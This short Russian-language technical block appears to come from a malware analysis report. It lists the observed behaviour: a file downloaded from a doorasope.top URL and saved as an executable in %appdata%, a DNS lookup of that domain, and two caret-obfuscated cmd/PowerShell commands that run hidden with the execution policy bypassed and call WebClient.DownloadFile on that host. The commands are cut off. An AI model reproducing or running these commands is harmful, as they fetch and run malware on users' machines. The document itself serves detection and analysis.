Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOw^e^R^SHE^ll.exE ^-exE^cu^TI^onPoLiCy^ BypAss^ -n^Op^R^OFiL^E ^-wI^n^DOw^sTYLE hI^dde^N^ (n^EW-o^B^jE^ct ^S^YS^tEM.nET^.w^ebCLi^en^T^)^.Down^l^OADfiL^E^('http://www.dooraso...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "pOw^e^R^SHE^ll.exE ^-exE^cu^TI^onPoLiCy^ BypAss^ -n^Op^R^OFiL^E ^-wI^n^DOw^sTYLE hI^dde^N^ (n^EW-o^B^jE^ct ^S^YS^tEM.nET^.w^ebCLi^en^T^)^.Down^l^OADfiL^E^('http://www.dooraso...' (со скрытым окном)